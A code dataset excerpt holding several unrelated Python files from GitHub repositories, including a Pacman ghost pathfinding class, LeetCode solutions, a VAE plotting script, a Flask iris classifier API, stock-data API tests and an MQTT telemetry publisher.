self.image = pygame.image.load('block.png')\n self.position = position\n self.rect = self.image.get_rect()\n self.rect.center = self.position\n\nclass Ghost(pygame.sprite.Sprite):\n def __init__(self, position, number): \n pygame.sprite.Sprite.__init__(self)\n \n if number == 0: self.image = pygame.image.load('blinky.png')\n elif number == 1: self.image = pygame.image.load('inky.png')\n elif number == 2: self.image = pygame.image.load('pinky.png')\n elif number == 3: self.image = pygame.image.load('clyde.png')\n \n self.safeCorner = (0, 0) \n self.ghostID = number\n self.position = position\n self.rect = self.image.get_rect()\n self.rect.center = self.position\n self.gridLocation = (0, 0)\n self.direction = 0\n self.hitWall = 0\n self.canMove = 0\n self.prevDirection = 4\n self.scatter = 0\n self.targetTile = (0, 0)\n self.flipped = 0\n self.path = []\n \n def getSafeCorner(self): \n if self.ghostID == 0: self.safeCorner = (0, game.gridLength)\n elif self.ghostID == 1: self.safeCorner = (game.gridHeight, game.gridLength)\n elif self.ghostID == 2: self.safeCorner = (0, 0)\n elif self.ghostID == 3: self.safeCorner = (game.gridHeight, 0)\n\n def flipDirection(self):\n if self.direction == 0: self.direction = 2\n elif self.direction == 1: self.direction = 3\n elif self.direction == 2: self.direction = 0\n elif self.direction == 3: self.direction = 1\n\n def findTargetTile(self): \n if not self.scatter:\n self.flipped = 0\n y, x = game.pacman.gridLocation\n if self.ghostID == 0: #Blinky: Target tile is pacmans current tile\n self.targetTile = (y, x)\n \n if self.ghostID == 1: #Inky: Target tile is double the vector between blinky and pacman\n tmpX = 0\n tmpY = 0\n if game.pacman.direction == 0:\n tmpX = x\n tmpY = y - 2\n if game.pacman.direction == 1:\n tmpX = x - 2\n tmpY = y \n if game.pacman.direction == 2:\n tmpX = x\n tmpY = y + 2 \n if game.pacman.direction == 3:\n tmpX = x + 2\n tmpY = y\n blY, blX = game.blinky.gridLocation\n self.targetTile = (blY + ((tmpY - blY) * 2), blX + ((tmpX - blX) * 2))\n \n if self.ghostID == 2: #Pinky: Target tile is 2 ahead of direction pacman is currently travelling\n if game.pacman.direction == 0: self.targetTile = (y - 2, x)\n if game.pacman.direction == 1: self.targetTile = (y, x - 2)\n if game.pacman.direction == 2: self.targetTile = (y + 2, x)\n if game.pacman.direction == 3: self.targetTile = (y, x + 2)\n \n if self.ghostID == 3: #Clyde: If closer than 8 tiles target tile is safe corner, otherwise same as blinky\n clY, clX = self.gridLocation\n distX = x - clX\n distY = y - clY\n if distX >= 8 or distX <= -8 or distY >= 8 or distY <= -8: self.targetTile = (y, x)\n else: self.targetTile = self.safeCorner\n\n def update(self):\n self.hitWall = 0\n if self.targetTile == (0, 0): self.findTargetTile()\n if self.safeCorner == (0, 0): self.getSafeCorner()\n\n atInter = 0\n for i in game.level.intersections:\n if i == self.gridLocation:\n atInter = 1\n \n if self.scatter and not self.flipped:\n self.flipped = 1\n self.flipDirection()\n self.targetTile = self.safeCorner\n\n if not self.scatter:\n self.findTargetTile()\n \n xVel = yVel = 0\n x, y = self.position\n\n if not self.path:\n cameFrom, costSoFar = game.level.aStarSearch(self.gridLocation, self.targetTile)\n self.path = game.level.reconstructPath(cameFrom, self.gridLocation, self.targetTile)\n\n if self.canMove and not self.hitWall or atInter:\n if self.direction == 0: yVel = -1\n elif self.direction == 1: xVel = -1\n elif self.direction == 2: yVel = 1\n elif self.direction == 3: xVel = 1\n\n self.position = (x + xVel, y + yVel)\n\n for i in range(0, len(game.levelCoords)):\n for j in range(0, len(game.levelCoords[i])):\n tmpRect = self.image.get_rect()\n tmpRect.center = (x + xVel, y + yVel)\n if self.rect.center == game.levelCoords[i][j]: self.gridLocation = (i, j)\n if tmpRect.center == game.levelCoords[i][j]: self.gridLocation = (i, j)\n\n blockCollisions = pygame.sprite.spritecollide(self, game.blockS, False)\n for block in blockCollisions:\n cameFrom, costSoFar = game.level.aStarSearch(self.gridLocation, self.targetTile)\n self.path = game.level.reconstructPath(cameFrom, self.gridLocation, self.targetTile)\n pX, pY = self.path[0]\n self.position = (25 + (pY*24), 25 + (pX*24))\n self.hitWall = 1\n \n if atInter:\n self.checkDirection()\n \n self.rect = self.image.get_rect()\n self.rect.center = self.position\n\n def checkDirection(self):\n gridX, gridY = self.gridLocation\n if self.path[1]:\n pathX, pathY = self.path[1]\n if pathX - 1 == gridX:\n self.direction = 3\n self.path.pop(0)\n elif pathX + 1 == gridX:\n self.direction = 1\n self.path.pop(0)\n elif pathY - 1 == gridY:\n self.direction = 0\n self.path.pop(0)\n elif pathY + 1 == gridY:\n self.direction = 2\n self.path.pop(0)\n \n \nif __name__ == \"__main__\":\n game = Game()\n game.mainLoop()\n","repo_name":"Tim-Snow/pacman","sub_path":"Pacman.py","file_name":"Pacman.py","file_ext":"py","file_size_in_byte":22861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"35900825928","text":"# Attemp1: recurssion. TLE if it's not True\n# class Solution:\n# def isHappy(self, n: int) -> bool:\n# if not n or n == 1:\n# return True\n# res = digit = 0\n# while n:\n# digit = n % 10\n# res += digit * digit\n# n = n // 10\n# return True if res == 1 else self.isHappy(res)\n\n# APP1: use set to see if it's been seen\n# Time: O(n) space: O(n) Runtime: 84%\n# class Solution:\n# def isHappy(self, n: int) -> bool:\n# if not n or n == 1:\n# return True\n# seen = set()\n# while n != 1 and n not in seen:\n# seen.add(n)\n# n = self.next_happy(n)\n# return True if n == 1 else False\n\n# def next_happy(self, n):\n# res = digit = 0\n# while n:\n# digit = n % 10\n# res += digit * digit\n# n = n // 10\n# return res\n\n# APP2: two pointers to reduce space to O(1)\n# Time: O(n) space: O(1) Runtime: 61%\nclass Solution:\n def isHappy(self, n: int) -> bool:\n if not n or n == 1:\n return True\n slow, fast = n, n\n while fast != 1:\n slow = self.next_happy(slow)\n fast = self.next_happy(self.next_happy(fast))\n if slow != 1 and slow == fast:\n return False\n return True\n\n def next_happy(self, n):\n res = digit = 0\n while n:\n digit = n % 10\n res += digit * digit\n n = n // 10\n return res","repo_name":"ruifengli-cs/leetcode","sub_path":"Two pointers/202. Happy Number.py","file_name":"202. Happy Number.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7497928222","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom loguru import logger\nfrom torchvision import datasets\nfrom torchvision.transforms import ToTensor\nfrom tqdm import tqdm\n\nfrom settings import VAESettings, VAEstreamer\n\nlogger.add(\"logs/vae.log\")\nlogger.add(\"/tmp/autoencoder.log\")\n\n\ndef sample_range(encoder, stream, k: int = 10):\n minmax_list = []\n for _ in range(10):\n X, _ = next(stream)\n y = encoder(X).detach().numpy()\n minmax_list.append(y.min())\n minmax_list.append(y.max())\n minmax = np.array(minmax_list)\n return minmax.min(), minmax.max()\n\n\ndef build_latent_grid(decoder, minimum: int, maximum: int, k: int = 20):\n x = np.linspace(minimum, maximum, k)\n y = np.linspace(minimum, maximum, k)\n xx, yy = np.meshgrid(x, y)\n grid = np.c_[xx.ravel(), yy.ravel()]\n\n img = decoder(torch.tensor(grid, dtype=torch.float32))\n return img.detach().numpy()\n\n\ndef plot_grid(\n img: np.ndarray,\n filepath: Path,\n k: int = 3,\n figsize: tuple = (10, 10),\n title: str = \"\",\n) -> None:\n fig, axs = plt.subplots(k, k, figsize=figsize)\n fig.suptitle(title, fontsize=16)\n axs = axs.ravel()\n for i in tqdm(range(k * k)):\n axs[i].imshow(img[i], cmap=\"gray\")\n axs[i].axis(\"off\")\n fig.savefig(filepath)\n logger.success(f\"saved grid to {filepath}\")\n\n\ndef main():\n logger.info(\"Starting show_vae.py\")\n\n presets = VAESettings()\n\n logger.info(\"loading data\")\n test_data = datasets.MNIST(\n root=presets.data_dir,\n train=False,\n download=True,\n transform=ToTensor(),\n )\n teststreamer = VAEstreamer(test_data, batchsize=32).stream()\n\n modelpath = presets.modeldir / presets.modelname\n\n logger.info(f\"loading pretrained model {modelpath}\")\n model = torch.load(modelpath)\n\n X, Y = next(teststreamer)\n\n img = model(X)\n if not presets.imgpath.exists():\n presets.imgpath.mkdir(parents=True)\n\n imgpath = presets.imgpath / Path(\"vae-output-grid.png\")\n plot_grid(img.detach().numpy(), filepath=imgpath)\n\n if presets.latent == 2:\n minimum, maximum = sample_range(model.encoder, teststreamer)\n logger.info(f\"Found range min:{minimum} and max:{maximum}\")\n latent_grid = build_latent_grid(model.decoder, minimum, maximum, k=20)\n latentpath = presets.imgpath / Path(\"latentspace.png\")\n plot_grid(latent_grid, filepath=latentpath, k=20)\n\n else:\n logger.info(\"To visualize the latent space, set VAESettings.latent=2\")\n logger.success(\"Finished show_vae.py\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"raoulg/MADS-MachineLearning-course","sub_path":"notebooks/6_unsupervised/src/show_vae.py","file_name":"show_vae.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"40265296962","text":"import numpy as np\nfrom flask import Flask, abort, jsonify, request\nimport jsonpickle\nimport pickle as pickle\nfrom flask_cors import CORS, cross_origin\n\n# Load the file into my_random_forest\nmy_random_forest = pickle.load(open(\"iris_rfc.pkl\", \"rb\"))\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'SecretKey'\napp.config['CORS_HEADERS'] = 'Content-Type'\n\ncors = CORS(app, resources={r\"/iris\": {\"origins\": \"http://localhost:port\"}})\n\n@app.route('/iris', methods = ['POST'])\n@cross_origin(origin='localhost',headers=['Content-Type','Authorization'])\ndef make_predict():\n # Request the data from the post method and store in data\n data = request.get_json(force = True)\n \n predict_request = [data['sl'], data['sw'], data['pl'], data['pw']]\n\n # Convert the array to an numpy array\n predict_request = np.array(predict_request)\n # Reshape the data to a 2d array\n predict_request = predict_request.reshape(-1,4)\n\n # Change the numpy array with 64bit ints into an array that can be jsonified\n y_hat = my_random_forest.predict(predict_request).tolist()\n output = y_hat\n\n # Jsonify results\n return jsonify(results = output)\n\nif __name__ == '__main__':\n app.run(port = 9000, debug=True)","repo_name":"nataliedrewfs/iris","sub_path":"iris_flask.py","file_name":"iris_flask.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33971197385","text":"import os\nfrom subprocess import check_output\n\ntry:\n VERSION = __import__('pkg_resources') \\\n .get_distribution('sentry').version\nexcept Exception as e:\n VERSION = 'unknown'\n\n\n# print(VERSION)\n\ndef _get_git_revision(path):\n if not os.path.exists(os.path.join(path, '.git')):\n return None\n try:\n revision = check_output(['git', 'rev-parse', 'HEAD'], cwd=path, env=os.environ)\n except Exception:\n return None\n return revision.strip().decode()\n\n\ndef get_revision():\n if 'SENTRY_BUILD' in os.environ:\n return os.environ['SENTRY_BUILD']\n package_dir = os.path.dirname(__file__)\n chekout_dir = os.path.normpath(os.path.join(package_dir, os.pardir, os.curdir))\n path = os.path.join(chekout_dir)\n if os.path.exists(path):\n return _get_git_revision(path)\n return None\n\n\ndef get_version():\n if __build__:\n return '%s.%s' % (__version__, __build__)\n return __version__\n\n\n__version__ = VERSION\n__build__ = get_revision()\n\n\nif __name__ == '__main__':\n print(get_version())\n print(__version__)\n print(__build__)\n","repo_name":"lfany/py","sub_path":"sentry/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7043961051","text":"class Solution:\n def getBiggestThree(self, grid: List[List[int]]) -> List[int]:\n rows, cols = len(grid), len(grid[0])\n res = set()\n \n def isValid(pos):\n return 0 <= pos[0] < rows and 0 <= pos[1] < cols\n \n def calculateTotal(lst, size):\n top, left, right, bottom = lst\n x, y = top\n total = grid[top[0]][top[1]] + grid[bottom[0]][bottom[1]] if size > 0 else grid[top[0]][top[1]]\n \n for i in range(1, size + 1):\n l = (x + i, y - i)\n r = (x + i, y + i)\n total += (grid[l[0]][l[1]] + grid[r[0]][r[1]])\n \n if size > 1:\n x, y = bottom\n for i in range(1, size):\n l = (x - i, y + i)\n r = (x - i, y - i)\n total += (grid[l[0]][l[1]] + grid[r[0]][r[1]])\n \n return total\n \n def dfs(x, y, size):\n top = (x, y)\n left = (x + size, y - size)\n right = (x + size, y + size)\n bottom = (x + (size * 2) , y) if size != 0 else top\n \n lst = [top, left, right, bottom]\n \n if all(isValid(pos) for pos in lst):\n total = calculateTotal(lst, size)\n res.add(total)\n dfs(x, y, size + 1)\n \n for i in range(rows):\n for j in range(cols):\n dfs(i, j, 0)\n \n return sorted(list(res))[::-1][:3]","repo_name":"hwennnn/leetcode-solutions","sub_path":"problems/get_biggest_three_rhombus_sums_in_a_grid/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"44087773510","text":"import time,logging,traceback,unittest\r\nfrom HTMLReport import ddt,no_retry\r\nfrom common.parameter import ParameTestCase\r\n\r\nfrom common.tools import postReq\r\nfrom config import domainCMBI\r\nfrom testData.data_F10 import codeDataF10_HK\r\n\r\n# 1、 (不测)/hkf10/announcement 获取港股公告详情\r\n# 2、 /hkf10/announcements 获取港股F10公告列表\r\n# 3、 /hkf10/brief 获取港股简况tab数据\r\n# 4、 (不测)/hkf10/brief/more/dividend 获取更多分红派息\r\n# 5、 (不测)/hkf10/brief/more/holdSharesChange 获取更多持股变动\r\n# 6、 (不测)/hkf10/brief/more/leaderPosition 获取更多公司高管\r\n# 7、 (不测)/hkf10/brief/more/shareholder 获取更多股本股东\r\n# 8、 (不测)/hkf10/detail 股票百科详情信息\r\n# 9、 /hkf10/finance 获取港股财务tab数据\r\n# 10、 (不测)/hkf10/more/finance 获取港股三大表更多\r\n# 11、 (不测)/hkf10/more/mainBusiness 获取港股主营构成更多\r\n# 12、 /hkf10/myAnnouncements 获取自选股公告列表\r\n# 13、 (不测)/hkf10/newsItem 获取港股新闻详情\r\n# 14、 /hkf10/newsList 获取港股新闻列表\r\n# 15、 /hkf10/sellShort 获取港股做空成交比例及更多\r\n\r\n# @unittest.skip('跳过')\r\n@ddt.ddt\r\nclass TestF10_HK(ParameTestCase):\r\n\t@classmethod\r\n\tdef setUpClass(cls):\r\n\t\tlogging.info(' ########## 港股F10 接口测试开始 ########## ')\r\n\r\n\tdef setUp(self):\r\n\t\tpass\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_02_announcements(self,market_Code):\r\n\t\t'''获取港股F10公告列表'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股F10公告列表 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/announcements'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股F10公告列表 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_03_brief(self,market_Code):\r\n\t\t'''获取港股简况tab数据'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股简况tab数据 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/brief'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股简况tab数据 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_09_finance(self,market_Code):\r\n\t\t'''获取港股财务tab数据'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股财务tab数据 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/finance'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股财务tab数据 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_12_myAnnouncements(self,market_Code):\r\n\t\t'''获取自选股公告列表'''\r\n\t\tlogging.info(f' ========== 测试开始 获取自选股公告列表 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/myAnnouncements'\r\n\t\tdataJson={'marketAndCodes':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取自选股公告列表 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_14_newsList(self,market_Code):\r\n\t\t'''获取港股新闻列表'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股新闻列表 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/newsList'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股新闻列表 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_15_sellShort(self,market_Code):\r\n\t\t'''获取港股做空成交比例及更多'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股做空成交比例及更多 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/sellShort'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股做空成交比例及更多 ========== ')\r\n\r\n\tdef tearDown(self):\r\n\t\tpass\r\n\r\n\t@classmethod\r\n\tdef tearDownClass(cls):\r\n\t\tlogging.info(' ########## 港股F10 接口测试结束 ########## ')\r\n\r\nif __name__=='__main__':\r\n\tunittest.main()","repo_name":"JoffreyN/apiAutotest","sub_path":"testCase/testF10_HK.py","file_name":"testF10_HK.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"17659518897","text":"import os\r\nos.system(\"cls\")\r\n\r\nlistaCodigo = []\r\nlistaNombre = []\r\nlistaCategoria = [\"Sobre\",\"Paquete\"]\r\nlistaPrecio = []\r\nlistaCantidad = []\r\n\r\nnomUsuario = input(\"Ingrese Nombre: \")\r\napellUsuario = input(\"Ingrese Apellido: \")\r\n\r\nmenu = \"\"\"------------------------\r\nBienvenido A SuperStore\r\n------------------------\r\n1. Registrar Producto\r\n2. Buscar Producto\r\n3. Lista De Productos\r\n4. Salir\r\n------------------------\r\n\"\"\"\r\n\r\n\r\ndef IngresarF():\r\n while True:\r\n try:\r\n while True:\r\n cod = int(input(\"Codigo del producto: \"))\r\n if len(str(cod)) < 6 or len(str(cod)) > 6:\r\n print(\"Error al ingresar\")\r\n else:\r\n listaCodigo.append(cod)\r\n break\r\n while True:\r\n nom = input(\"Nombre del producto: \")\r\n if len(str(nom)) < 2 or len(str(nom)) > 50:\r\n print(\"Error al ingresar\")\r\n else:\r\n listaNombre.append(nom)\r\n break\r\n while True:\r\n cat = input(\"Categoria del producto: \")\r\n if cat == \"Sobre\" or cat == \"Paquete\" or cat == \"sobre\" or cat == \"paquete\":\r\n listaCategoria.append(cat)\r\n break\r\n else:\r\n print(\"Error al ingresar\")\r\n while True:\r\n pre = int(input(\"Precio Del Producto: $\"))\r\n if pre > 0:\r\n listaPrecio.append(pre)\r\n break\r\n else:\r\n print(\"Error al ingresar\")\r\n while True:\r\n stok = int(input(\"Stock del producto: \"))\r\n if stok >= 0:\r\n listaCantidad.append(stok)\r\n break\r\n elif stok < 0 or float:\r\n print(\"Error al ingresar\") \r\n except:\r\n print(\"Ocurrio una excepcion\")\r\n\r\ndef BuscarF():\r\n codi = input(\"Ingrese codigo a ingresar: \")\r\n print(f\"Listar: {codi}\")\r\n for i in range(len(listaCodigo)):\r\n if codi == listaCodigo:\r\n print(\"----------------------------------------------\")\r\n print(f\"{listaCodigo[i]:6d}{listaNombre[i]:50s}{listaCantidad[i]:30s}{listaPrecio[i]:10s}{listaCantidad[i]:6d}\") \r\n print(\"----------------------------------------------\")\r\n\r\ndef ListarF():\r\n print(\"CODIGO|NOMBRE|CATEGORIA|PRECIO|STOCK\")\r\n cant=0\r\n for i in range(len(listaCodigo)):\r\n if listaCodigo[i] < 5:\r\n stock = \"SI\"\r\n cant += 1\r\n else: \r\n stock = \"NO\"\r\n print(\"----------------------------------------------\")\r\n print(f\"{listaCodigo[i]:6d}{listaNombre[i]:50s}{listaCantidad[i]:30s}{listaPrecio[i]:10s}{listaCantidad[i]:6d}\") \r\n print(\"----------------------------------------------\")\r\n\r\nwhile True:\r\n try:\r\n opc = int(input(menu))\r\n if opc == 4:\r\n print(f\"Gracias por visitarnos {nomUsuario} {apellUsuario}\")\r\n print(\"Version 1.1.0\")\r\n break\r\n elif opc == 1:\r\n IngresarF()\r\n elif opc == 2:\r\n BuscarF()\r\n elif opc == 3:\r\n ListarF()\r\n else:\r\n print(\"Error al ingresar\")\r\n except:\r\n print(\"Ocurrio una excepcion\")\r\n\r\n\r\ninput(\"\\n Enter para terminar\")","repo_name":"Fabiancitto/Certamen_3","sub_path":"Evaluacion 3.py","file_name":"Evaluacion 3.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"45471487989","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x, left =None , right = None):\n self.val = x\n self.left = left\n self.right = right\n\nclass Solution:\n def helper(self, root: TreeNode):\n if not root: return False\n l,r = self.helper(root.left), self.helper(root.right)\n if not l: root.left = None\n if not r: root.right = None\n return any([l,r,(root.val == 1)])\n\n def pruneTree(self, root: TreeNode) -> TreeNode:\n self.helper(root)\n return root\n\nroot = TreeNode(1, TreeNode(1, TreeNode(1, TreeNode(0)), TreeNode(1)), TreeNode(0, TreeNode(0), TreeNode(1)))\ns =Solution()\nans = s.pruneTree(root)\nprint(ans)","repo_name":"NLe1/Competitive-Programming","sub_path":"Leetcode/Leetcode-Binary Tree Pruning.py","file_name":"Leetcode-Binary Tree Pruning.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"42779091199","text":"import os\nimport pandas as pd\nimport numpy as np\nimport itertools\nimport random\nfrom sklearn.model_selection import KFold\n\n\ndef split(dataset, n_splits=5, ratio=10):\n \n fpath = '../data/moa/' + dataset + '/'\n drug_smi = pd.read_csv(fpath + 'drug_smi.csv', sep='\\t')\n tar_seq = pd.read_csv(fpath + 'tar_seq.csv', sep='\\t')\n # tar_gene = pd.read_csv(fpath + 'tar_gene.csv', sep='\\t')\n dti = pd.read_csv(fpath + 'dti.csv', sep='\\t')\n\n drugs = list(drug_smi['DrugID'])\n targets = list(tar_seq['TargetID'])\n\n dti_all = list(itertools.product(drugs, targets))\n dti_pos = [(row[0], row[1]) for _, row in dti.iterrows()]\n dti_neg_all = list(set(dti_all) - set(dti_pos))\n assert len(dti_all) == len(dti_neg_all) + len(dti_pos)\n\n dti_neg = random.sample(dti_neg_all, len(dti_pos) * ratio)\n\n dti_pos = [tup + (1,) for tup in dti_pos]\n dti_neg = [tup + (0,) for tup in dti_neg]\n dti = np.array(dti_pos + dti_neg)\n\n drugs_arr = np.array(drugs)\n targets_arr = np.array(targets)\n \n def save_fold(data, setting, idx, name):\n data = pd.DataFrame(data, columns=['DrugID', 'TargetID', 'label'])\n fold_path = fpath + 'data_folds/' + setting\n os.makedirs(fold_path, exist_ok=True)\n data.to_csv(fold_path + '/' + name + '_fold_' + str(idx) + '.csv', index=None)\n \n def split_warm(setting='warm_start'):\n kf = KFold(n_splits=n_splits, shuffle=True, random_state=0)\n idx = 0\n for train_index, test_index in kf.split(dti):\n dti_train = dti[train_index]\n dti_test = dti[test_index]\n save_fold(dti_train, setting, idx, 'train')\n save_fold(dti_test, setting, idx, 'test')\n idx += 1\n\n def split_drug_cold(setting='drug_coldstart'):\n kf = KFold(n_splits=n_splits, shuffle=True, random_state=0)\n idx = 0\n for train_index, test_index in kf.split(drugs_arr):\n dti_train = dti[np.isin(dti[:, 0], drugs_arr[train_index])]\n dti_test = dti[np.isin(dti[:, 0], drugs_arr[test_index])]\n save_fold(dti_train, setting, idx, 'train')\n save_fold(dti_test, setting, idx, 'test')\n idx += 1\n\n def split_protein_cold(setting='protein_coldstart'):\n kf = KFold(n_splits=n_splits, shuffle=True, random_state=0)\n idx = 0\n for train_index, test_index in kf.split(targets_arr):\n dti_train = dti[np.isin(dti[:, 1], targets_arr[train_index])]\n dti_test = dti[np.isin(dti[:, 1], targets_arr[test_index])]\n save_fold(dti_train, setting, idx, 'train')\n save_fold(dti_test, setting, idx, 'test')\n idx += 1\n \n split_warm()\n split_drug_cold()\n split_protein_cold()\n \n print(dataset + ' dataset split completed.')\n\n\nif __name__ == '__main__':\n \n for dataset in ['activation', 'inhibition']:\n split(dataset)\n","repo_name":"CSUBioGroup/DTIAM","sub_path":"code/data_process/data_split_moa.py","file_name":"data_split_moa.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"33727900412","text":"import os\nimport time\nimport sys\nimport json\nimport random\nimport paho.mqtt.client as mqtt\nimport ssl\n\nTHINGSBOARD_HOST = 'srv-iot.diatel.upm.es'\nACCESS_TOKEN = '3qLLqP02I6b3z4laOxYB'\n# Function to read sensor values\n'''def read_from_sensor():\n temp = random.randint(25,45)\n hum = random.randint(50,60)\n air = random.randint(55,60)\n light = random.randint(100,180)\n return temp, hum, air,light'''\n# Thingsboard platform credentials\n\n\n'''INTERVAL = 5\nsensor_data = {'temperature' :0,'humidity':0,'air_quality':0,'light_intensity':0}\nnext_reading = time.time()'''\nsensor_data = {'Status' : 1, 'Tree':24, 'Field':3, 'Water ml': 73}\n\nclient = mqtt.Client()\nclient.username_pw_set(ACCESS_TOKEN)\nclient.tls_set(certfile=None,\n keyfile=None,\n cert_reqs=ssl.CERT_REQUIRED)\nclient.connect(THINGSBOARD_HOST,8883)\nclient.loop_start()\n\ntry:\n while True:\n #temp,hum,air,light = read_from_sensor()\n\n '''print(\"Temperature:\",temp, chr(176) + \"C\")\n print(\"Humidity:\", hum,\"%rH\")\n print(\"Air Quality:\", air,\"%\")\n print(\"Light Intensity:\", light,\"lux\")\n \n sensor_data['temperature'] = temp\n sensor_data['humidity'] = hum\n sensor_data['air_quality'] = air\n sensor_data['light_intensity'] = light'''\n\n client.publish('v1/devices/me/telemetry',json.dumps(sensor_data))\n time.sleep(10)\n\n\nexcept KeyboardInterrupt:\n pass\n\nclient.loop_stop()\nclient.disconnect()","repo_name":"mgmarin23/Architure_Project","sub_path":"Pub_MQTT.py","file_name":"Pub_MQTT.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
